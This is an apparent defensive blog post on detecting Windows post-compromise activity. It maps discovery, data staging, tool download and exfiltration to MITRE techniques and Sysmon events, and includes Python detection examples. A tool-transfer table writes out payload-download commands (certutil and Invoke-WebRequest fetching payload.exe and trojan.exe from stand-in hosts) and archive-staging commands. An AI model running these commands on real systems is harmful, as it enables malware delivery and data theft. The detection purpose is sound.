Windows Threat Detection: Discovery, Collection, and Ingress Tool Transfer
- DFIRHive

- Oct 26

Introduction — Beyond Initial Access
In Part 1: Initial Access, we examined how attackers first breach Windows environments — through brute-forced RDP, phishing attachments, or infected USB devices. But once inside, the story doesn’t stop there.
After gaining a foothold, adversaries immediately begin Discovery, Collection, and Ingress Tool Transfer — three post-access phases that determine how far they can go. These are the crucial minutes where intruders map the terrain, harvest credentials, and bring in specialized tools to expand control.
In this blog, we’ll trace these steps using the TryHackMe Windows Threat Detection lab and confirmed case patterns from ransomware operators like BlackSuit and Medusa, and from data stealers like RedLine Stealer.
Each section connects MITRE ATT&CK techniques with their practical footprint in Windows Event Logs and Sysmon.
Windows Discovery Phase: Understanding the Attacker’s First Orientation
After gaining access, the attacker’s first move is understanding the system — “Who am I, where am I, and what can I do?”
This phase maps directly to MITRE’s Discovery (TA0007) tactic.
Starting with Reconnaissance?
Attackers start with basic reconnaissance commands, the same ones every Windows admin (and attacker) uses daily, usually run through PowerShell or cmd.exe:
whoami
ipconfig /all
net user
systeminfo
tasklist
net view /domain
In BlackSuit ransomware cases, threat actors often executed these commands within minutes of initial access, usually from the same session that followed the successful RDP brute force (explained in Part 1).

Mapping with MITRE
| Intent | Example Command | MITRE Technique |
|---|---|---|
| Identify user privileges | whoami /priv, net user | T1087 – Account Discovery |
| Learn about the system | systeminfo, wmic product get name,version | T1082 – System Information Discovery |
| Check the network | ipconfig /all, net view \\hostname | T1016 – System Network Configuration Discovery |
| Review defenses | Get-MpPreference, tasklist /v | T1518 – Software Discovery |
For deeper reference, explore the MITRE ATT&CK Discovery matrix (TA0007) — it defines how adversaries map environments post-access.

How to find traces in logs:
Use the Logon ID from the successful RDP session (Event ID 4624) to correlate discovery commands. In most cases, we’ll see the same ID linked to cmd.exe or powershell.exe processes — confirmation that reconnaissance occurred in that session.
EventID: 4624 → Logon ID: 0x1b2a3
Sysmon ID 1 → Parent Process: cmd.exe (Logon ID: 0x1b2a3)
When we find this pattern, we’ve confirmed the attacker is now interacting live with the system.
Sysmon Event ID 1 (ProcessCreate): cmd.exe and PowerShell command runs
Security Event ID 4688: new process creation (if audit logging is enabled)
Why it matters: Discovery often happens within minutes of login. A cluster of these commands tied to one Logon ID indicates early hands-on-keyboard activity.
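To make the Logon ID correlation above concrete, here is an added Python example (not from the original post or the TryHackMe lab) that runs over a few constructed 4624 and Sysmon Event ID 1 records: it keys each process creation to the 4624 Logon ID and flags a logon when several discovery commands run within a short window of it. The field names, the 10-minute window and the sample records are assumptions.

```python
from datetime import datetime, timedelta

# Enumeration commands from the post; a command line counts if it starts with one.
DISCOVERY_CMDS = ("whoami", "ipconfig", "net user", "net view", "systeminfo",
                  "tasklist", "wmic", "get-mppreference")

# Constructed sample records (not real telemetry). Field names are assumptions:
# a 4624 RDP logon (type 10) followed by Sysmon Event ID 1 records with the same LogonId.
EVENTS = [
    {"id": 4624, "time": "2025-10-26T09:00:00", "logon_id": "0x1b2a3", "logon_type": 10},
    {"id": 1, "time": "2025-10-26T09:00:40", "logon_id": "0x1b2a3", "parent": "cmd.exe", "cmd": "whoami /priv"},
    {"id": 1, "time": "2025-10-26T09:01:05", "logon_id": "0x1b2a3", "parent": "cmd.exe", "cmd": "ipconfig /all"},
    {"id": 1, "time": "2025-10-26T09:01:30", "logon_id": "0x1b2a3", "parent": "cmd.exe", "cmd": "net user"},
    {"id": 1, "time": "2025-10-26T09:02:10", "logon_id": "0x1b2a3", "parent": "cmd.exe", "cmd": "systeminfo"},
    # Different session with no matching 4624 in this slice: ignored.
    {"id": 1, "time": "2025-10-26T09:05:00", "logon_id": "0x9f001", "parent": "explorer.exe", "cmd": "notepad.exe notes.txt"},
    # Same session but hours later: outside the window, so not part of the cluster.
    {"id": 1, "time": "2025-10-26T12:30:00", "logon_id": "0x1b2a3", "parent": "cmd.exe", "cmd": "tasklist /v"},
]

def is_discovery(cmd):
    """True when the command line starts with a known enumeration command."""
    return cmd.lower().strip().startswith(DISCOVERY_CMDS)

def find_discovery_clusters(events, window_minutes=10, min_commands=3):
    """Map each 4624 Logon ID to the discovery commands its Sysmon 1 records ran
    within window_minutes of the logon; keep only logons with >= min_commands."""
    logons = {e["logon_id"]: datetime.fromisoformat(e["time"])
              for e in events if e["id"] == 4624}
    hits = {}
    for e in events:
        if e["id"] != 1 or e["logon_id"] not in logons or not is_discovery(e["cmd"]):
            continue
        age = datetime.fromisoformat(e["time"]) - logons[e["logon_id"]]
        if timedelta(0) <= age <= timedelta(minutes=window_minutes):
            hits.setdefault(e["logon_id"], []).append(e["cmd"])
    return {lid: cmds for lid, cmds in hits.items() if len(cmds) >= min_commands}

if __name__ == "__main__":
    for lid, cmds in find_discovery_clusters(EVENTS).items():
        print(f"Logon {lid}: {len(cmds)} discovery commands within 10 min -> {cmds}")
```

On real data the same join works against Security 4624 `TargetLogonId` and Sysmon 1 `LogonId`, which is the field pairing the log excerpt above relies on.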

Collection — Gathering What Matters
After mapping the system, attackers move on to gathering information worth stealing.
Collection can be as simple as copying text files and credential caches, or as complex as staging browser data and documents before exfiltration.
MITRE ATT&CK classifies this as TA0009 – Collection, which covers adversary techniques used to gather and stage data prior to exfiltration.
Gremlin Stealer and RedLine are malware families that automate this phase. They silently grab browser sessions, VPN credentials, and Telegram tokens, and even take screenshots (see Unit42’s analysis).
Common Indicators:
Creation of new directories with random suffixes (staging_58f1, data_01.tmp)
Execution of compression utilities:
Compress-Archive -Path C:\Users\ -DestinationPath C:\Users\Public\data.zip
Files written to C:\Users\Public\ or C:\ProgramData\ — typical staging areas.

In the TryHackMe lab, this stage was simulated using PowerShell commands such as:
Get-ChildItem C:\Users\victim\Documents -Recurse -Filter *.pdf
Compress-Archive -Path C:\Temp -DestinationPath C:\Temp\data.zip
How It Appears in Logs:
Sysmon 1: PowerShell execution with keywords Compress-Archive, copy, Out-File
Sysmon 11: File creation — .zip, .rar, or .7z archives
Sysmon 13: Registry access (for credential harvesting)

Ingress Tool Transfer: Loading New Weapons
Once attackers know where they are and what’s valuable, they’ll transfer additional tools into the environment. This is the Ingress Tool Transfer phase — when utilities like credential dumpers, network scanners, or remote agents are downloaded or copied to the compromised host.
MITRE calls this Ingress Tool Transfer (T1105).
For example, DFIR Report’s analysis of Remcos RAT infections showed the malware arriving through PowerShell downloads using Invoke-WebRequest, while Mimikatz often appeared as a secondary payload retrieved via certutil.exe. Both highlight how native Windows utilities can be abused for silent tool imports.
Common Methods
| Tool / Command | Example | Notes |
|---|---|---|
| Certutil | certutil.exe -urlcache -split -f https://evil.site/payload.exe | Built-in Windows tool |
| PowerShell IWR | Invoke-WebRequest -Url http://appsforfree.thm/trojan.exe -OutFile C:\Temp\trojan.exe | Very common in phishing chains |
| curl.exe | curl https://cdn.github.com/payload.exe -o setup.exe | Modern Windows 10+ |
| GUI (RDP) | Copy-paste via session | Often missed in logs |
Detection:
Sysmon 1: PowerShell, certutil, or curl process creation
Sysmon 3: Network connection to suspicious domains
Sysmon 11: New .exe file creation in C:\Temp\ or C:\Users\Public\
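The Collection indicators and the Ingress Tool Transfer methods above share the same detection shape: a command-line match on Sysmon Event ID 1 plus a path match on Sysmon Event ID 11. This added Python example (not the post’s or the lab’s code) turns the post’s own examples into a small classifier and runs it over constructed records; the tag names, the staging-directory list and the samples are assumptions.

```python
import re

# Sysmon Event ID 1 command-line patterns built from the post's own examples:
# Compress-Archive staging, certutil -urlcache, Invoke-WebRequest -OutFile, curl -o.
COMMAND_RULES = [
    ("collection:archive", re.compile(r"compress-archive\s", re.I)),
    ("ingress:certutil", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("ingress:powershell_iwr", re.compile(r"\b(invoke-webrequest|iwr)\b.*-outfile", re.I)),
    ("ingress:curl", re.compile(r"\bcurl(\.exe)?\b\s+https?://\S+.*\s-o\b", re.I)),
]

# Sysmon Event ID 11 FileCreate: staging directories and archive types named in the post.
STAGING_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\temp\\")
ARCHIVE_EXT = (".zip", ".rar", ".7z")

def classify(event):
    """Tag a constructed Sysmon record ({"id": 1, "cmd": ...} or {"id": 11, "target": ...})
    with the phase it indicates, or return None when nothing matches."""
    if event["id"] == 1:
        for tag, rx in COMMAND_RULES:
            if rx.search(event["cmd"]):
                return tag
    elif event["id"] == 11:
        path = event["target"].lower()
        if path.endswith(ARCHIVE_EXT):
            return "collection:archive_written"
        if path.startswith(STAGING_DIRS) and path.endswith(".exe"):
            return "ingress:exe_in_staging_dir"
    return None

# Constructed sample records mirroring the post's examples (not real telemetry).
SAMPLES = [
    {"id": 1, "cmd": r"powershell Compress-Archive -Path C:\Users\ -DestinationPath C:\Users\Public\data.zip"},
    {"id": 1, "cmd": r"certutil.exe -urlcache -split -f https://evil.site/payload.exe"},
    {"id": 1, "cmd": r"Invoke-WebRequest -Url http://appsforfree.thm/trojan.exe -OutFile C:\Temp\trojan.exe"},
    {"id": 1, "cmd": r"curl https://cdn.github.com/payload.exe -o setup.exe"},
    {"id": 1, "cmd": r"certutil.exe -hashfile C:\installer.msi SHA256"},  # legitimate certutil use
    {"id": 11, "target": r"C:\Temp\data.zip"},
    {"id": 11, "target": r"C:\Users\Public\trojan.exe"},
    {"id": 11, "target": r"C:\Program Files\Vendor\app.exe"},  # install path, not a staging dir
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{classify(s)!s:30} <- {s.get('cmd') or s.get('target')}")
```

The `-hashfile` sample shows why the certutil rule keys on `-urlcache` rather than on the binary name alone: certutil has routine administrative uses, and alerting on every invocation would bury the download pattern in noise.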
Exfiltration: sending stolen data out.
Every intrusion ultimately ends with data exfiltration, where attackers transfer stolen data from a compromised Windows system to external destinations — such as cloud storage, attacker-controlled C2 servers, or file-sharing services like Dropbox or Mega. This phase, tracked under MITRE ATT&CK T1041 – Exfiltration Over C2 Channel, often marks the final stage of the Windows threat lifecycle.
While many organizations focus on detecting initial breaches, the exfiltration phase often reveals the true impact — what data left the network, where it went, and how. Analysts correlate DNS or network logs with process telemetry to spot outbound data flows to suspicious domains.
Example Case – AXIOM Campaign: Analysts observed the AXIOM group using Hikit, a persistence backdoor, to exfiltrate data via fake update servers impersonating trusted services such as Amazon or Windows Update.

Reference Table
| Phase | Technique | MITRE ID | Log Source | Example Indicator |
|---|---|---|---|---|
| Discovery | System/Network Enumeration | T1082, T1016 | Sysmon 1 | whoami, ipconfig |
| Collection | Data Staged | T1074 | Sysmon 11 | data.zip creation |
| Tool Transfer | File Download | T1105 | Sysmon 3, 11 | certutil, PowerShell IWR |
| Credential Access | LSASS Dump | T1003 | Sysmon 10 | Access to lsass.exe |
| Exfiltration | Data Upload | T1041 | Sysmon 3 | Upload to external domain |
This completes our Windows Threat Detection two-part series — walking from the first signs of intrusion to the final act of exfiltration. These patterns repeat across most modern ransomware and espionage campaigns.
The goal isn’t just detection — it’s understanding the why behind every event log, so that defenders can anticipate the attacker’s next move.